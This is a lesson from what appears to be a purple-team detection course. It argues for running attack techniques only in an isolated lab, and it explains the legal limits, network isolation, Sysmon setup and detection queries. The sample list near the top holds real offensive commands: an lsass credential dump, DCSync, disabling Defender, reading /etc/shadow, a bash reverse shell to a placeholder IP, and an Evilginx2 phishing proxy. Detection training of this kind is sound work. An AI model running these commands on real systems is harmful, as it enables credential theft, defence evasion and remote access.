PT1.1 Why a Local Lab — and Why Not Your Work Environment
You've worked in environments where testing is restricted. You've probably wanted to run a detection test against a production alert and been told no — or done it quietly and hoped nothing broke. This sub makes the case that a local lab is the only safe way to validate detections, and shows what the alternatives get wrong.
What the course asks you to run
This is a sample of the commands you'll execute across Modules 2–14. Read them and consider where you'd be comfortable running them:
# Module 7 — Credential dumping (T1003.001)
procdump.exe -ma lsass.exe C:\Windows\Temp\debug.dmp
# Module 7 — DCSync (T1003.003)
secretsdump.py NORTHGATE/admin@192.0.2.10 -just-dc-ntlm
# Module 5 — UAC bypass (T1548.002)
Invoke-AtomicTest T1548.002 -TestNumbers 1
# Module 6 — Disable Windows Defender (T1562.001)
Set-MpPreference -DisableRealtimeMonitoring $true
# Module 13 — Ransomware simulation (T1486)
# Encrypts files in a target directory with a test key
# Module 3 — Reverse shell (T1059.004)
bash -i >& /dev/tcp/192.0.2.50/4444 0>&1
# Module 5 — Sudo abuse (T1548.003)
sudo -u root /bin/bash
# Module 7 — Shadow file access (T1003.008)
cat /etc/shadow
# Module 14 — AiTM phishing proxy (capstone)
# Evilginx2 capturing session cookies through MFA
evilginx2 -p ./phishlets -debug
Every one of these is a real attacker technique. Every one produces real telemetry. Every one would trigger real alerts in a production SIEM — if the detection rules work. And every one is illegal to run against systems you don't own.
The legal boundary
The laws are unambiguous:
UK — Computer Misuse Act 1990. Unauthorized access to computer material is a criminal offence (Section 1). Unauthorized acts that impair a computer — which includes dumping credentials, disabling security tools, and encrypting files — are a separate offence (Section 3), carrying a maximum penalty of 10 years' imprisonment. Authorization means explicit written permission from the system owner. Your employer's general IT security role does not constitute authorization to run offensive techniques against production systems.
US — Computer Fraud and Abuse Act (CFAA). Accessing a computer without authorization or exceeding authorized access is a federal crime (18 U.S.C. § 1030). The definition of "exceeding authorized access" was interpreted broadly for years before Van Buren v. United States (2021) narrowed it, and its boundaries are still contested. Running procdump -ma lsass.exe on a domain controller you administer for IT purposes may exceed your authorized access if your authorization doesn't explicitly include offensive security testing.
Your employer's environment. Even with explicit authorization from your employer, running attack techniques in production carries risks that a lab doesn't. A credential dump in production captures real credentials. A ransomware simulation in production risks real data loss if the kill switch fails. A reverse shell in production creates a real backdoor. The lab eliminates all of these risks because nothing in the lab is real — the credentials are test credentials, the data is test data, the systems are disposable VMs.
What a local lab gives you
Safety. The lab is isolated. Attack traffic stays inside the lab network. Credentials are test credentials. VMs are disposable — if you break one, rebuild it. Nothing in the lab connects to production systems, real user data, or business-critical services.
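For instance, on VirtualBox (PT1.2 covers hypervisor choice) that isolation comes down to a host-only network. A minimal sketch, with a hypothetical VM name; the adapter name varies by host OS (vboxnet0 on Linux/macOS):
# Create a host-only network, then attach the target VM's first NIC to it
VBoxManage hostonlyif create
VBoxManage modifyvm "WIN-TARGET-01" --nic1 hostonly --hostonlyadapter1 vboxnet0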
Repeatability. You can run the same technique ten times to study the telemetry variations. You can snapshot a VM before an attack and revert after. You can tear down the entire lab and rebuild it from scratch to test a different configuration. Production doesn't give you any of this.
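On VirtualBox, for example, the snapshot-and-revert loop is a handful of commands. VM and snapshot names here are hypothetical:
# Snapshot before firing the technique
VBoxManage snapshot "WIN-TARGET-01" take "pre-T1003"
# ...run the attack, study the telemetry, then revert
VBoxManage controlvm "WIN-TARGET-01" poweroff
VBoxManage snapshot "WIN-TARGET-01" restore "pre-T1003"
VBoxManage startvm "WIN-TARGET-01"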
Full telemetry access. In the lab, you own the SIEM. You can see every event, modify every rule, tune every threshold. In production, you may not have write access to Sentinel analytics rules. In the lab, you control the entire pipeline from Sysmon configuration to SIEM query.
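As a taste of that control at the Sysmon end, here's a sketch assuming the 64-bit binary and a config file named sysmonconfig.xml:
# Install Sysmon with a config
sysmon64.exe -accepteula -i sysmonconfig.xml
# Swap in a new config without reinstalling
sysmon64.exe -c sysmonconfig.xml
# Dump the active config to verify what's deployed
sysmon64.exe -c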
Parallel SIEM comparison. The lab runs three SIEMs simultaneously. You fire one technique and check detection in Sentinel, Defender XDR, and Splunk/Elastic. In production, you typically have one SIEM with one set of rules. The lab lets you compare detection across platforms — which is half the course's value.
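To make that concrete, here's what a check for the Module 7 credential dump might look like in two of the query languages. Table names, index names, and field mappings are assumptions that depend on how your lab ingests telemetry:
// Defender XDR Advanced Hunting (KQL): flag ProcDump targeting lsass
DeviceProcessEvents
| where FileName =~ "procdump.exe" and ProcessCommandLine has "lsass"
And a Splunk SPL equivalent, assuming Sysmon process-creation events land in a hypothetical "sysmon" index:
index=sysmon EventCode=1 Image="*\\procdump.exe" CommandLine="*lsass*"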
Permanent ownership. The lab is yours after the course. Use it for ongoing purple-team work, team training, detection rule development, or proof-of-concept testing. Production access may change when you change roles. The lab doesn't.
What about cloud-hosted labs?
If your workstation can't run VMs locally, cloud-hosted VMs work. Rent Windows and Linux VMs in Azure, AWS, or any cloud provider. The lab build instructions in PT1.2–PT1.6 transfer — you're running the same software, just on remote hardware.
The trade-off: cloud VMs cost money beyond the Sentinel subscription (typically £40–80/month for the compute), and network configuration is more complex (you need to ensure attack traffic stays inside your cloud network, not routed through the public internet). The course doesn't walk the cloud path explicitly, but the principles are identical.
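As one illustration: if the lab lives in Azure, a lowest-priority deny-all outbound rule on the lab subnet's NSG (paired with higher-priority allows for the endpoints your SIEM agents need) keeps attack traffic inside the virtual network. Resource names here are hypothetical:
# Deny all egress to the internet from the lab NSG (priority 4096 = lowest)
az network nsg rule create --resource-group lab-rg --nsg-name lab-nsg \
  --name deny-internet-egress --priority 4096 --direction Outbound \
  --access Deny --protocol '*' --destination-address-prefixes Internet \
  --destination-port-ranges '*'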
The four boundaries
Every Try-it in the course includes a safety callout with four boundaries. Here's what they mean:
Lab boundary. Run techniques only in your own lab. Not at work. Not on a friend's machine. Not on a cloud instance you share with others. Your lab, your VMs, your responsibility.
Dev tenant boundary. M365 attacks run only in your developer tenant — the one you sign up for in PT1.7. Not your work tenant. Not a client's tenant. Not a tenant someone gave you admin access to for a different purpose. The dev tenant is explicitly built for this kind of testing.
Network boundary. Lab traffic stays inside the lab. C2 callbacks go to your local Caldera instance, not to public IPs. If you're using cloud VMs, firewall rules prevent egress to the wider internet on attack ports (an example rule follows the data boundary below). No lab traffic should ever leave your controlled network.
Data boundary. Telemetry from the lab lives in your own SIEM instance. Don't paste raw telemetry containing machine names or user names into public channels — Discord, GitHub issues, social media. Even dev-tenant data. Keep the operational hygiene clean from day one, because the habit transfers to production work.
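The network boundary can be enforced rather than trusted. On a Linux attack VM, a sketch assuming VirtualBox's default host-only subnet (192.168.56.0/24) and the Module 3 C2 port:
# Drop outbound traffic on the C2 port unless it stays inside the lab subnet
sudo iptables -A OUTPUT -p tcp --dport 4444 ! -d 192.168.56.0/24 -j DROP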
These four boundaries appear in every technique sub. By Module 3 you'll skim them. That's fine — the point is the boundary stays visible, not that you re-read it word for word every time.
What comes next
PT1.2 starts the build. You'll pick a hypervisor, download the VM images, and create the first virtual machine. By the end of PT1.6 you'll have all four target environments running. PT1.7–PT1.11 configure the cloud services and SIEMs. PT1.12 fires the first technique and confirms everything works end to end.
The lab build is the longest free module in the course. Take it one sub at a time. Each sub ends with a verification step — if the verification passes, you're ready for the next sub.
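The checks differ by sub, but they're all in this spirit: a hypothetical end-of-sub verification, in PowerShell, that Sysmon is installed and writing events:
# Service should report Running
Get-Service Sysmon64
# Recent events confirm telemetry is flowing
Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" -MaxEvents 5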
You've built the lab and understand the validation gap.
Module 0 showed you why detection rules fail silently — vendor schema changes, attacker tool evolution, environment divergence, tuning drift. Module 1 gave you a working four-environment, three-SIEM purple-team lab. From here, you walk the kill chain technique by technique.
- 61 ATT&CK techniques across 12 tactic modules — Initial Access through Impact, each walked end-to-end with attack commands, annotated telemetry, and multi-SIEM detection rules
- Every detection in four formats — Sigma rule (canonical), Sentinel KQL, Defender XDR Advanced Hunting KQL, and Splunk SPL or Elastic. Tabbed side-by-side in every technique sub
- Module 14 Capstone — CHAIN-HARVEST — full purple-team exercise on an AiTM credential-phishing chain. Multi-stage attack, detection results across all three SIEMs, coverage gaps, tuning recommendations
- Programme template — coverage matrix, MTTD per technique, FP rates, detection quality scores, remediation backlog. Populated as you work, presentable to leadership by Module 14
- Public Sigma rule repo — every detection rule in a GitHub repository. Alumni contribute via PR. The artefacts outlive the course